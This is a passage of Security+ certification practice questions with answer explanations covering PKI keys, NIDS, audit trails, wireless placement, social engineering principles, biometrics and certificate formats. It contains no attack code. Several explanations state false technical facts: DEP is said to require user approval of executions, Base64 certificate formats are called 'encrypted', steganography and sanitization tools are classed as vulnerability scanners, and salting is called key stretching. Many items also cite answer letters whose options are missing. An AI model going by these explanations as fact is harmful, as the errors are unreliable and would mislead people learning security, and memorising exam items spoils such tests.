attack patterns. As long as the firewall is accessible from the correlation engine, it is not necessary that the correlation engine be placed in close proximity to the firewall.
Because of the information collected by correlation engines, you should ensure that the appropriate security controls are deployed to protect the engine. SSL accelerators assist the processor-intensive activities associated with SSL/TLS encryption. Load balancers would be placed based on where they are needed. If it needs to balance the load among several web servers, the load balancer would be placed in the DMZ. If, however, there is high traffic associated with internal file servers, the load balancer would be better placed in the same network segment as the file servers. Taps (monitoring ports) and port mirrors allow an IDS to examine network traffic. They should be placed in the appropriate network segment. VPN concentrators should be placed in the perimeter network near the gateway. SDN is a Software Defined Network and virtualizes the entire network, including the security devices.

How can you keep the production network safe from vulnerabilities that may be caused by a failed test in the R&D department?

Air gap; Sandboxing. Airgapping (or air gapping) in network security means that you physically separate secure networks and equipment from insecure networks and equipment. For example, you would not want to have your development or R&D platforms on the same network as your production equipment. Data cannot move between air gapped and insecure systems unless it is physically transferred on media, like a disk or USB stick. Air gapping is an important security concept for IoT devices as well. Sandboxing is developing an application outside of the production environment. Sandboxing can also be useful to test a legacy operating system that may not have security patches. Virtual machines are often used to create the sandbox. Memory allocation issues may be discovered during sandbox testing, but are not directly a part of the sandbox functionality. Answer B is incorrect. A Faraday cage is a security measure that protects against eavesdropping or signals leaving the room. The "cage" is wire mesh or other conductive material woven together to protect the room. Answer A is incorrect. Tokens and cards include items that a user must possess in order to gain access to the building, room, or network resource. They include one-time passwords that authenticate the user, and smart cards. They are an integral part of authentication, but do not provide internetwork protection.

Alice wishes to send a file to Bob using a PKI. Which of the following types of keys should Alice use to sign the file?

Alice's private key Alice should use her own private key to sign the file. Refer to Table 14-4 in the book. It shows that to send an encrypted signature, Alice (the sender) would need her own private key. To decrypt the signature, Bob (the recipient) would need Alice's (the sender's) public key. In this scenario, Bob's keys don't even come into play because he is the receiver. However, in a scenario where Alice had sent Bob an encrypted message, Bob's public and private keys would be utilized for the encrypting and decrypting of the message, respectively.

You need to install a network-based intrusion detection system (NIDS) for your company. Which statement is NOT a characteristic of this device?

An NIDS analyzes encrypted information. The primary disadvantage of an NIDS is its inability to analyze encrypted information. For example, the packets that traverse through a Virtual Private Network (VPN) tunnel cannot be analyzed by the NIDS. An NIDS would most likely be used to detect, but not react to, behavior on the network. Answer C is incorrect. An NIDS monitors real-time traffic over the network, captures the packets, and analyzes them either through a signature database or against the normal traffic pattern behavior to ensure that there are no intrusion attempts or malicious threats. NIDS finds extensive commercial implementation in most organizations. An NIDS can help identify smurf attacks. Answer D is incorrect. An NIDS can monitor either a complete network or some portions of a segregated network. It remains passive while acquiring the network data. For example, an intrusion detection system (IDS) can monitor real-time traffic on the internal network or a de-militarized zone (DMZ). In a DMZ, public servers, such as e-mail, DNS, and FTP servers, are hosted by an organization to segregate these public servers from the internal network. Answer A is incorrect. An NIDS does not monitor specific workstations. A host-based IDS (HIDS) monitors individual workstations on a network. An intrusion detection agent should be installed on each individual workstation of a network segment to monitor any security breach attempt on a host.

You have set up an auditing system for the servers on your network. Which three statements regarding an audit trail are NOT true?

An audit trail does not record successful login attempts. An audit trail is a preventive control. An audit trail is reviewed only when an intrusion is detected. An audit trail is not a preventive control. It is a detective control that maintains a sequential record of the system activities and the system resource usage. An audit trail records a lot of useful information, such as successful and unsuccessful login attempts, user identification, password usage, and resources accessed by a user over a span of time. Audit trails can also provide information about events related to the operating system and the application. Audit trail records are usually reviewed before an intrusion has been detected and contained. Before the affected system is reinstalled and production restarted, audit trail records enable you to track the source of the intrusion, understand the type of attack, and identify any loophole that can result in a potential security breach in the future. The main purpose of audit logs and trails is to establish individual accountability and responsibility. Access to audit logs and trails should be tightly controlled. In addition, the data recorded in an audit log must be strictly controlled. Separation of duties must be enforced to ensure that personnel who administer the access control function and personnel who administer the audit trail are two different people. A security administrator should periodically review audit trails to detect any suspicious activity or a performance bottleneck in the infrastructure resources. An administrator can select certain critical events and log them for review. The administrator can later use the events for analysis. Instead of manually reviewing a large amount of audit trail data, applications and audit trail analysis tools can be used to reduce the volume of audit logs and to improve the efficiency of the review process.
Such analysis tools can be used to provide information about specific events in a useful format and in sufficient detail. For the Security+ exam, you need to understand permission auditing and review and usage auditing and review. Permission auditing and review ensures that users have the appropriate permissions to complete the tasks that are part of their job. By implementing permission auditing and review, you ensure that privilege creep does not occur. Usage auditing and review ensures that accounts are still being used. By implementing usage auditing and review, you ensure that accounts that are no longer in use are disabled.

Your company has decided to deploy a new wireless network at a branch office. This branch office is located in a busy commercial district. Management has asked you to fully assess the external vulnerabilities of the wireless network before it is deployed. Which three conditions should you assess?

Antenna type Antenna placement Access point power Antenna type (such as the use of directional versus omnidirectional antennas) plays an important role in protecting a wireless network. Using a directional antenna can limit the area that is covered by the antenna. Antenna placement will also have an effect on the vulnerabilities of a wireless system. Antennas should be placed as far away from exterior walls as possible. Otherwise, the signal will go outside the building. This allows anyone outside the building to attach to your network. That is why RADIUS and other technologies are required for wireless networks. The power of the access points should be adjusted to a level that is just strong enough for the operation of the network, but not so strong that signals escape to the outside of the building. You should reduce power levels for better security to ensure that the signal does not extend beyond its needed range. Answers F and D are incorrect. The number of users and the speed of the connection will not cause external vulnerabilities to a wireless system. The number of user addresses is, however, a cause of external vulnerabilities. Answer E is incorrect. Captive portals are a type of wireless access point that only permits Internet access to authenticated users. While an organization may want to deploy this solution, it is not necessary to assess this as an external vulnerability. You should ensure that any wireless network that you deploy is properly protected from unauthorized users. Usually this just involves deploying the network using the WPA or WPA2 protocol. If you use WEP, unauthorized users can easily gain access to your network. You should also be careful as to which internal resources are connected to the wireless network without deploying the appropriate security hardware, such as a firewall. Some wireless access points will allow you to select the wireless band frequency. This band selection feature usually uses either the 2.4 or 5.0 GHz frequency. The bandwidth speed will vary, depending on which 802.11 standard is used. 802.11a is capable of up to 54 Mbps. 802.11b is capable of up to 11 Mbps. 802.11g is capable of up to 54 Mbps. 802.11n is capable of up to 300 Mbps. But remember that bandwidth is shared by all the devices connected.

You suspect that several users are attempting to install unauthorized software. Upon researching, you discover that the attempts were unsuccessful. What tool did you implement that logged those attempts and identified the users?

Application whitelisting Application whitelisting is the practice of denying all applications except for those that are approved. Those approved applications are designated as whitelisted. Several products are available that check for applications that are not on the whitelist, including attempts to install those applications. For example, the logs generated by the whitelisting product would tell you if someone had attempted to install a keylogger. Answer B is incorrect. Removable media control (RMC) is important in many environments. USB drives, SD cards, CDs, DVDs, and Blu-ray devices can all present dangers to the system. As an example, someone can use a USB drive to copy sensitive information and deliver it to someone outside the organization. Another example could be a CD that appears to be a music CD, but is actually installation media for unauthorized software. Examine the RMC logs to determine attempts to violate removable media policies. Answer C is incorrect. File integrity checks examine selected files to see if there have been any changes. Some file integrity checks just notify you of a change, while others can actually return a file to its previous state if the change is unauthorized. File integrity checks would not monitor attempts to install applications. Answer D is incorrect. Patch management tools assist with the installation of patches, which can present a significant challenge to an enterprise environment. Best practices dictate that you install a patch on a test machine and verify that the patch performs as expected prior to deploying it throughout the network. It is important to examine the logs to check for failed updates, incompatible patches, and unsuccessful patch installations. These tools would not monitor attempts to install applications. HIDSs and HIPSs have two different functions. Host-based Intrusion Detection Systems (HIDS) will provide an alert in the event of a breach on a single server or computer. Host-based Intrusion Prevention Systems (HIPS) will go a step further and stop the attack. An example of a HIPS in action would be shutting down port 80 when HTTP traffic exceeds the baseline norm. With either product, it would be important to view the log entries generated, and interpret the results based on documentation provided by the HIPS/HIDS vendor. These devices log inbound traffic, not necessarily internal attempts to install applications on a device. Antivirus products (and the antimalware products that encompass them) provide notifications when a threat has been detected, and what action was taken. On many occasions, the software will identify a potential threat and prompt you to choose an action to take. Antivirus products might scan an application that a user is attempting to install, but if the application is not actually malware, it will not notify an administrator or log the attempt. Host-based firewalls include products that are installed as an application, or included in the OS, such as the Windows Firewall. In the case of Windows Firewall, it is possible to have the firewall activated, but not generating log entries. You can activate logging by going into the console, choosing Actions, and then choosing Properties. You can customize the logging settings by clicking the Customize button in the Logging section on the Domain Profile tab. Firewalls monitor inbound traffic, not internal attempts to install applications. Advanced malware tools check for malicious code that would otherwise slip by standard antivirus and antimalware tools. Unified Threat Management (UTM) incorporates several threat management devices and systems into one appliance. The biggest advantage to a UTM, from an analysis standpoint, is that all the logs are in one place, as opposed to checking multiple systems. Data Loss Prevention (DLP) examines outbound traffic for sensitive data, keywords, and specific files leaving the organization. It does not monitor internal attempts to install applications. Data execution prevention (DEP) forces the user to approve an application before it executes, or launches. Logs will record execution attempts, including failed attempts. Notification of failed attempts is important, as it could tell you that your antimalware application successfully blocked an attempt to install malware. Forcing a user to approve an execution will not prevent them from installing an unapproved application. A web application firewall (WAF) uses a set of defined rules to manage incoming and outgoing web server traffic, as well as attack prevention. Organizations can define their own rules based on their particular vulnerability. It would not monitor application installations.

Your organization is designing a database warehouse. Database administrators are trying to decide between implementing database-level, application-level, or warehouse-level security for the data warehouse. Which statements are TRUE?

Application-level security secures both the data and the functions of the application. Database-level security is best if more than one application is being used to access the data warehouse. Database-level security is best if there will be more than 100 users for the data warehouse. The security table will likely become the largest table within the warehouse. All of the options are correct. When deciding between implementing database-level, application-level, or warehouse-level security for a data warehouse, keep the following points in mind: Application-level security secures both the data and the functions of the application. Database-level security is best if: There will be more than 100 users for the data warehouse. More than one application is being used to access the data warehouse. The security table will likely become the largest table within the warehouse.

Which of the following is a type of malware that is difficult to reverse engineer?

Armored virus The armored virus protects itself from AV programs by tricking the program into thinking that it is located in a different place than where it actually resides. It thwarts attempts at analysis of its code. This makes it difficult to reverse engineer, and therefore makes building a defense against it difficult. A logic bomb is code that is inserted into software that "detonates" one of many types of malware when specific criteria are met. So, the logic bomb is more of a method of delivery for malware than the malware itself. The same holds true for backdoors; they are coded entrances to a system that either were designed for testing and forgotten about or are openings that were never found during a secure code review. A worm is similar to a virus except that it self-replicates. However, worms are fairly easy to detect and locate, making reverse engineering at least feasible.

The company who just hired you provides a fixed amount to new employees so that the employee can purchase the laptop of their choice. After the purchase, the employee only needs to submit the receipt. What should you implement so that the company is able to better track the laptops?

Asset management Asset management allows an organization to keep track of equipment and software. Laptops, tablets, servers, routers, and switches are among the assets that the company should track. Software asset management includes license control, version control, and knowing what software is installed on what equipment. Answer D is incorrect. Unauthorized software can include both pirated software and open source versions of otherwise "pricey" applications. For example, instead of purchasing the required Microsoft Office, someone may decide to use an unauthorized open source application like OpenOffice or LibreOffice. While using open source software may not violate licensing issues, installing unauthorized software is a policy violation. Answer A is incorrect. Baseline deviations occur when a key metric of network operation is performing outside of its normal range. The normal range for a given metric is called a baseline. For example, assume that network traffic is normally 5 Mbps on Monday morning at 8 AM. Upon inspection, you find that on a particular Monday at 8 AM the network traffic was 120 Mbps. This would indicate that you have a baseline deviation, and it would require further investigation to determine the source. While it could simply be attributed to remote employees working from the office, researching the cause is always important. Answer B is incorrect. License compliance violations (availability/integrity issues) arise when someone installs an unlicensed copy of an application or operating system. Such an installation is a violation of copyright law, and may result in severe financial implications for the organization. Authentication issues are associated with validating authentication credentials. Authentication issues can result if incorrect credentials are provided or if the authentication server is down. To troubleshoot such issues, technicians should attempt to log in using a different account. If the login is successful, then something is wrong with the user's credentials. If the login is not successful, then a communication issue is the problem, and you should troubleshoot the connection with the authentication server.

Which of the following is used when performing a quantitative risk analysis?

Asset value Asset value is an actual concrete piece of information that you can make risk-based decisions with in a quantitative manner. The other answers are vague at best and don't give solid details for your risk analysis; they might be better suited for qualitative risk analysis.

Your company has deployed an application that requires access to a user's Google account. What would OpenID Connect provide in this deployment?

Authentication of the user's Google account OpenID Connect provides the authentication necessary in OAuth 2.0. It authenticates the user and stores the user information in a secure token. A secure token contains the user information and authentication information used by OpenID. OAuth is Open Authorization. The current standard, OAuth 2.0, grants an application limited access to a user's account on a third-party site, such as Facebook or Twitter. OAuth could grant the application access to a friend's list or give the application the ability to post on the user's behalf. Shibboleth uses Security Assertion Markup Language (SAML), which defines security authorizations on web pages, as opposed to web page elements in HTML. Shibboleth is a single sign-on (SSO) system but does allow the usage of Facebook, Google, or Twitter credentials.

Which of the following defines the main difference between identification and authentication?

Authentication verifies a set of credentials, whereas identification verifies the identity of a user requesting credentials.

Which of the following offer the best protection against brute-forcing passwords? (Select the two best answers.)

Bcrypt PBKDF2 Bcrypt and PBKDF2 are examples of key stretching software. This software takes a weaker password key and stretches the key length, in the end outputting an enhanced and more powerful key, usually to 128 bits in length. This makes brute-force attacks difficult if not impossible. Bcrypt also adds salting (additional data added to the password hash), which helps protect against dictionary attacks and rainbow table attacks. MD5 and SHA2 are cryptographic hashing protocols, used to verify the integrity of files. AES is a common symmetric encryption protocol used to encrypt files and session data. CHAP is an authentication scheme, one that could be used by a RADIUS server or other authentication system.

Which principle behind a social engineering attack relies on the victim's belief that the attacker is someone who can be trusted, based on the attacker's supposed job title or position?

Authority Authority attacks are particularly effective because they feed on the victim's assumption that the attacker is automatically someone to be trusted. That trust is based on the attacker's apparent position or title, either within or outside of the organization. Examples include "This is Keith Brown, the IT Director" or "This is FBI Special Agent Andrea Wilson." Answer D is incorrect. Intimidation attacks threaten the victim and make the victim feel guilty. The threats can be financial, job loss, physical threats, and threats of harming the victim's family. Answer A is incorrect. Familiarity attacks happen when the attacker gets the victim to "like" them. This can be done through membership in the same organizations, participation in the same types of activities, or exploiting a common interest. Answer B is incorrect. Trust attacks attempt to gain the victim's trust. In some cases, the victim feels the need to reciprocate after the attacker has done some good deed for the victim. This results in a situation where the victim trusts the attacker. Some examples of a good deed include helping the victim get out of a tight situation, paying for a meal, and taking the blame for something the victim was accused of. Other social engineering attack principles include consensus attacks, scarcity attacks, and urgency attacks. Consensus attacks deal with the attacker giving attention to the victim. When an attacker offers praise, flattery, encouragement, or validation of a victim's ideas, it often leads the victim to believe that the attacker is an ally as opposed to an enemy. Attackers can also create a sense of consensus by providing the victim with false testimonials or positive reviews that convince the victim other people approve of the attacker's link or malware. Scarcity attacks deal with supply and demand. By telling the victim that there is a limited supply ("Only 5 remaining at this special price"), the attacker can draw the victim to a phony website to complete the "purchase." At the website, the attacker collects the victim's information for further exploitation. Urgency attacks create the illusion that a time-sensitive issue must be acted upon right away. The attacker convinces the victim that failure to act will result in a financial or legal penalty, or some other unpleasant consequence. Reference: CompTIA Security+ Deluxe Study Guide: SY0-501. Chapter 10: Social Engineering and Other Foes, The Principles Behind Social Engineering. Lesson: Social Engineering, User Education, and Facilities Security. Objective: Social Engineering.

You are in charge of your organization's backup plan. You need to make sure that the data backups are available in case of a disaster. However, you need to keep the plan as inexpensive as possible. Which of the following solutions should you implement?

Back up data to removable media and store a copy offsite Backing up data to removable media and storing it offsite is the least expensive solution. Hot sites and cold sites can cost the organization a lot of money, especially hot sites. Implementing a remote backup solution usually requires some sort of service with a monthly fee. You, as the network administrator, can back up data to removable media and store it offsite without incurring any other fees except for the cost of the removable media.

Bob wants to send an encrypted e-mail to Alice. Which of the following will Alice need to use to verify the validity of Bob's certificate? (Select the two best answers.)

Bob's public key The CA's public key The key word here is verify. If Alice is to verify the validity of Bob's certificate, she will need either Bob's public key or the CA's public key. Table 1 sums up the keys required for encrypting/decrypting data, signatures, and certificates. This table is based on RSA, but usually these rules of thumb hold true for any scenario where a public/private key pair are used.

Task                                                      | Which Person's Key to Use | Type of Key
Send an encrypted message                                 | Receiver's                | Public key
Decrypt an encrypted message                              | Receiver's                | Private key
Send an encrypted signature                               | Sender's                  | Private key
Decrypt an encrypted signature or verify a certificate    | Sender's                  | Public key

Table A: Summary of RSA Public and Private Key Usage

As you can see from the last row of the table, to decrypt an encrypted signature or verify a certificate, you would need the sender's public key; in this case, Bob's public key (or the CA's public key). Alice cannot use her own key to verify the certificate, and cannot use anyone else's private keys. She would have to use the public key of the sender, be it Bob's or the CA's. Table 1 shows that there are a variety of possibilities depending on the scenario, and depending on who is sending what. For example, if Bob sent an encrypted message to Alice, he would need to use her public key to encrypt the message, and Alice would need to use her private key to decrypt the message.

A NOP slide is an indication of what kind of attack?

Buffer overflow A NOP slide is a technique used to exploit a buffer overflow. This is done by corrupting the stack with no-op machine instructions. A NOP slide is sometimes referred to as a NOP sled or NO-OP sled. SQL injections exploit databases. XSS (cross-site scripting) attacks exploit web servers and web pages. Smurf attacks are DoS attacks.

What are recovery point objectives and recovery time objectives related to?

Business impact analysis Business impact analysis is the examination of critical versus noncritical functions. These functions are assigned two different values: recovery point objective (RPO), which is the acceptable latency of data, and recovery time objective (RTO), which is the acceptable amount of time to restore a function. Risk management is the identification, assessment, and prioritization of risks. Succession planning is a method for replacing servers and other equipment when they become outdated or if they fail permanently. A single point of failure is any hardware on a server or other device that will cause the device to shut down or otherwise stop serving users.

3-leg perimeter

A type of DMZ where a firewall has three legs that connect to the LAN, the Internet, and the DMZ.

You are working on a new security system for a U.S. military installation that is only accessed by military personnel. Which certificate-based authentication system should you integrate?

CAC A Common Access Card (CAC) is a certificate-based smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login. None of the other options are implemented by the U.S. military. Proximity cards are a type of smart card that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is within range of the proximity card, and the information transmitted is correct, authentication is granted. A Personal Identity Verification (PIV) card is a certificate-based smart card issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login. Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Smart cards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once stolen, the thief can use the card in the same manner as the rightful owner. As an example, if the user has access to a highly secure area by using the smart card, a thief would have the same access when using the stolen card. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user.

Which of the following is a type of photo ID that is used by government officials to gain access to secure locations?

CAC CAC (Common Access Card) is a smart card used by the Department of Defense (DoD) to identify military personnel, government employees, and so on. Biometrics is the science of using a human's physical characteristics for identification. DAC is the discretionary access control method. RSA tokens allow for rolling one-time passwords.

Your company has a mix of on-premises infrastructure and cloud-provider infrastructure and needs to extend the reach of its security policies beyond the internal infrastructure. Which of the following would be the BEST solution for the company to consider?

CASB If there is a mix of on-premises infrastructure and cloud-provider infrastructure, a company might consider a cloud access security broker (CASB). A CASB is a software tool or service that acts as the gatekeeper between the two, allowing the company to extend the reach of its security policies beyond its internal infrastructure. Software as a service (SaaS) is when users access applications over the Internet that are provided by a third party. The applications need not be installed on the local computer. Platform as a service (PaaS) is a service that provides various software solutions to organizations, especially the ability to develop applications in a virtual environment without the cost or administration of a physical platform. PaaS is used for easy-to-configure operating systems and on-demand computing. Monitoring as a service (MaaS) is a framework that facilitates the deployment of monitoring within the cloud in a continuous fashion.

You are evaluating several biometric authentication systems. Which is the best metric to use to quantify the effectiveness of the subject system?

CER Crossover error rate (CER) is the point where FAR and FRR are equal. Generally, a lower CER value would indicate a more accurate system. CER is primarily used to compare biometric authentication systems. False acceptance rate (FAR) is one way to measure the accuracy of a biometric authentication system. It measures how likely it would be that an unauthorized user is granted access to the system. Expressed as a ratio, it is the number of unauthorized users who were incorrectly allowed access to the protected system divided by the number of authentication attempts. A false acceptance can occur, for example, when an unauthorized individual with a dirty finger uses a fingerprint reader, and is allowed access to the system. This could happen because the system was not precise enough when matching the authorized user. By contrast, false rejection rate (FRR) measures how likely it would be that an authorized user is denied access to the system. It is also expressed as a ratio, calculated as the number of authorized users who were denied access to the protected system divided by the number of authentication attempts. False rejections can occur if the system settings are too precise, or if users are not trained properly on biometric login procedures. HOTP and TOTP are two types of one-time passwords, i.e., they can only be used once. Hashed One Time Passwords (HOTP) are secure passwords used with hardware tokens. Time-based One Time Passwords (TOTP) are issued for a specific period of time. Once used, or once the time expires, the TOTP is no longer valid. As an example of a TOTP, a user forgets a password to a website. When the user clicks the "Forgot Password" link, the website would send a new temporary password to the user, but would limit how long the temporary password would be valid. Other considerations include ABAC, proximity cards, smart cards, tokens, CAC, PIV, and file security. Attribute-based access control (ABAC) goes beyond authentication based on user name and password. It evaluates other factors, such as time of day and location of logons. ABAC would also be invoked if a user has read access to files, but is attempting to edit or delete files remotely. Smart cards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once stolen, the thief can use the card in the same manner as the rightful owner. As an example, if the user has access to a highly secure area by using the smart card, a thief would have the same access when using the stolen card. Proximity cards are a type of smart card that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is within range of the proximity card, and the information transmitted is correct, authentication is granted. Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user. A common access card (CAC) is a smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login. A personal identity verification (PIV) smart card is issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login. File system security should always be set to only allow what is absolutely essential for the user to do their job. This is also known as the principle of least privilege.

You suspect that several users are using expired digital certificates and that other digital certificates are very close to expiration. You need to examine the list of serial numbers of digital certificates that have not expired, but should be considered invalid. Which PKI component should you examine?

CRL A certificate revocation list (CRL) contains a list of serial numbers for digital certificates that have not expired, but that a certification authority (CA) has specified to be invalid. Typically, the serial number of a digital certificate is placed in a CRL because the digital certificate has been compromised in some way. Answers A, D, and C are incorrect. A CA generates and validates digital certificates. The CA verifies the authenticity of the certificate elements. A Key Distribution Center (KDC) is used in Kerberos network authentication to distribute resource access keys. User Datagram Protocol (UDP) provides connectionless communications on TCP/IP networks.

Where would you store a revoked certificate?

CRL The CRL (certificate revocation list) is where revoked certificates should be stored. Key escrow is when certificate keys are held in the case that third parties need to access information. The recovery agent recovers lost keys. PKI stands for public-key infrastructure and is the entire system of parts that allows for certificates, certificate authorities, and so on.

Which of the following might be included in Microsoft Security Bulletins?

CVE Common Vulnerabilities and Exposures (CVE) can be included in Microsoft Security Bulletins and will be listed for other web server products such as Apache. PHP and CGI are pseudo-programming languages used within HTML for websites. Both can contain harmful scripts if used inappropriately. Transport Layer Security (TLS) is a protocol used by sites secured by HTTPS.

Click to select the items in the list, and then drag them in the correct order in which the forensic analyst should preserve them.

1. Cache 2. RAM 3. Running processes 4. Hard drives 5. Backup media

You are building a public-access WiFi system for a new hotel. You want to require the users to accept a fair use policy before connecting to the Internet. Which of the following should you implement?

Captive portal Captive portals are associated with public-access WiFi networks. Once you select the network, you are directed to a web page. There, you typically have to sign on and agree to a policy such as an acceptable use or fair use policy. Once your agreement is accepted, you can use the network. These portals are typically found in a public place, such as a hotel, coffee shop, or airport. None of the other options would force users to accept a fair use policy before connecting to the Internet. Answer D is incorrect. WiFi Protected Setup (WPS) allows a wireless access point to broadcast a PIN, which connecting devices use for authentication. It is not a difficult task to break the PIN using a packet sniffer. Answer C is incorrect. IEEE 802.1X is a standard for network access control. It allows you to apply security to an individual port on a switch with the result of only allowing authenticated users access to that port. Answer B is incorrect. RADIUS Federation is a group of RADIUS servers that assist with network roaming and will validate the login credentials of a user belonging to another RADIUS server's network. For the Security+ exam, you also need to understand EAP-FAST, EAP-TLS, and EAP-TTLS. Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling (EAP-FAST) is used in wireless and point-to-point networks. EAP manages key transmissions, and FAST creates a TLS tunnel to be used in authentication through a protected access credential. In Extensible Authentication Protocol-Transport Layer Security (EAP-TLS), EAP manages key transmissions, and TLS uses X.509 digital certificates for authentication. In Extensible Authentication Protocol-Tunneled Transport Layer Security (EAP-TTLS), EAP manages key transmissions, and TTLS is an extension of TLS (which authenticates the server). TTLS encapsulates the TLS session, allowing for authentication of the client.

The IT director asks you to protect a server's data from unauthorized access and disclosure. What is this an example of?

Confidentiality Confidentiality means preventing the access and disclosure of information to unauthorized persons. Integrity means that authorization is necessary before data can be modified by a user. Availability means that data is obtainable regardless of how information is stored, accessed, or protected. Non-repudiation is a concept of ensuring that people cannot refute claims against them; it is accomplished with computer evidence such as log files.

You have set a password policy that requires default passwords to be changed upon system installation. However, you suspect that some default passwords have not been changed. Which software tool would you use to locate the password violations?

Configuration compliance scanner A configuration compliance scanner will look for vulnerabilities that fail to comply with configuration requirements. Such failures include default passwords that have not been changed, patches that have not been applied to network hardware, and firewalls that are not configured properly. Answers C, D, E, and A are incorrect. Vulnerability scanner is the general term for tools that help you locate weaknesses in your network before they are exploited by an attacker. Vulnerability scanners include steganography tools and data sanitization tools. Exploitation frameworks are tools used by a network administrator to test the security of a network, such as a penetration test. One of the best known exploitation framework tools is Metasploit. Data sanitization tools are used to ensure that information is completely removed from a device before it is discarded, sold, or recycled. A plethora of tools are available that assist with recovering deleted files. Steganography tools detect data or files that are hidden within other files. For example, Invisible Secrets hides data in sound or image files, and Deep Sound will also hide data in sound files.

Your network is a Windows domain controlled by a Windows Server domain controller. Your goal is to configure user access to file folders shared to the network. In your organization, directory access is dependent upon a user's role in the organization. You need to keep to a minimum the administrative overhead needed to manage access security. You need to be able to quickly modify a user's permissions if that user is assigned to a different role. A user can be assigned to more than one role within the organization. What solutions should you implement? (Select the two best answers.)

Create an OU for each organizational role and link GPOs to each OU Create security groups and assign access permissions based on organizational roles The first thing you should do as a network administrator is create organizational units (OUs) for each of the departments in your organization; this helps to categorize and classify where users will ultimately end up. Each OU will be considered a different role. Next on the list is creating Group Policy objects (GPOs), modifying the security policies, and applying those to each individual OU. Then, you should create the users and place them in their correct OUs according to the department that they will be working in and the role that they will play. Finally, you should create security groups, add users to the appropriate security group or groups, and apply access permissions to the groups, instead of the users, to save time and keep administrative overhead to a minimum. Placing the user's computer in an OU could cause issues when it comes time to move a user account to another OU; the computer account would need to be moved with it. Access permissions should not be assigned solely by the individual user account; this would increase administrative overhead by a great deal.

Which of the following web application security weaknesses can be mitigated by preventing the usage of HTML tags?

Cross-site scripting Cross-site scripting (XSS) is an attack on website applications that injects client-side script into web pages. SQL injection is a type of code injection that exploits vulnerabilities in databases. LDAP injection can be used to modify LDAP statements and modify the LDAP tree. Rootkits are software designed to gain administrator-level access over a computer system.

You are comparing cryptographic solutions to implement at your organization. Which two items should you focus on when you are evaluating implementation versus algorithm selection?

Crypto service providers Crypto modules You should focus on crypto service providers and crypto modules when you are evaluating implementation versus algorithm selection. Crypto service providers should be able to answer questions regarding which algorithm(s) they use to generate keys and how they store keys. Crypto service providers are parties that provide cryptographic services. An example is Active Directory Certificate Services from Microsoft. You should select crypto modules to match the type of data to be protected and the equipment on which the module will be deployed. For example, a module for a mobile device should not consume a substantial amount of processing power or battery life. An example is Microsoft Kernel Mode Cryptographic Module. None of the other options are factors that would affect the decision when evaluating a cryptographic solution based on implementation versus algorithm selection. Answer E is incorrect. Key stretching takes a weak key and makes it stronger by adding additional characters. Often, a password is hashed, and a salt is used to make the password stronger. Salting is a form of key stretching. Answer A is incorrect. Security through obscurity is the false confidence that the secret design or implementation is going to be sufficient to provide system safeguards. Often, the system is not all that secure, and the hope is that because no one knows about it, you are therefore protected. Key strength should reflect the sensitivity of the data it protects. Generally, as the need to secure the data increases, so should the strength of the key. Longer keys require more processing power (and time) to break.

Your web server that conducts online transactions crashed, so you examine the HTTP logs and see that a search string was executed by a single user masquerading as a customer. The crash happened immediately afterward. What type of network attack occurred?

DOS A denial-of-service (DoS) attack probably occurred. The attacker most likely used code to cause an infinite loop or repeating search, which caused the server to crash. It couldn't have been a DDoS (distributed denial-of-service) because only one attacker was involved. MAC spoofing is when an attacker disguises the MAC address of his network adapter with another number. MITM stands for the man-in-the-middle attack, which wasn't necessary since the attacker had direct access to the search fields on the web server. A DNS amplification attack is when an attacker spoofs DNS requests to flood a target website.

One of your servers (10.254.254.201) is only allowing slow and intermittent connections to clients on the network. You check the logs of the server and see a large number of connections from the following IP addresses: 10.254.254.38 10.254.254.79 10.254.254.102 11.57.86.86 198.155.201.214 212.119.64.32 The connections from these six hosts are overloading the server and causing it to stop responding to requests from clients. What type of attack is happening?

DDoS A DDoS (distributed denial of service) attack is occurring. Most likely there is a botnet with computers on the Internet (such as 212.119.64.32) and computers on the LAN (such as 10.254.254.102) that are all zombies—and part of the botnet—concentrating an attack on the server at 10.254.254.201. It is known as a distributed attack because the entire attack is broken up among multiple computers. These attacks often happen on a large scale, where thousands of computers simultaneously attack a well-known server. The Xmas tree attack is one where special packets are sent that have specific flags set. It can ultimately act as a denial of service (DoS) attack if launched correctly. But it is not used for distributed DoS attacks. XSS stands for cross-site scripting, a type of code injection attack that exploits a computer programming flaw, often in web server forms. As mentioned, DoS stands for denial of service, an attack often performed by a single computer, not six or thousands in the way that a DDoS attack would occur.

The client's specifications dictate that you use a Base64 ASCII-encoded certificate. Which of the following certificate types would NOT be acceptable?

DER You should not use a DER certificate, because the Distinguished Encoding Rules (DER) certificate is encoded by ASN.1 in X.690, not Base64. DER encoded files do not support storage of the private key or certification path. By default, Windows servers export certificate files as DER encoded files. DER is the "parent" format of PEM. All of the other types are Base64 ASCII-encoded certificates. Answers B, A, and D are incorrect. A P7B file is a certificate file format that uses Base64 ASCII encoding. It is generally used by the CA to provide certificate chains to clients. P12 is a variant of PFX. A PFX certificate file is used by Microsoft and contains both the public and private keys. The container is fully encrypted. You should use OpenSSL to convert this into a PEM encoded file. PFX and P12 are the most common file types for exporting the private key. Privacy Enhanced Mail (PEM) certificates are primarily used for web servers, and can be read in a text editor. The PEM encoded file format contains the certificate encoded in encrypted Base64. It is used in Unix/Linux environments. DER certificates can be converted to PEM encoded files with OpenSSL. A Canonical Encoding Rules (CER) certificate contains the certificate encoded in encrypted Base64. Like DER encoded files, CER does not support storage of the private key or certification path. Most certificates are in one of two formats: Base64-encoded or DER-encoded binary. Some web server applications may require the certificate to be in DER-encoded binary format.

Which of the following are symmetric encryption algorithms?

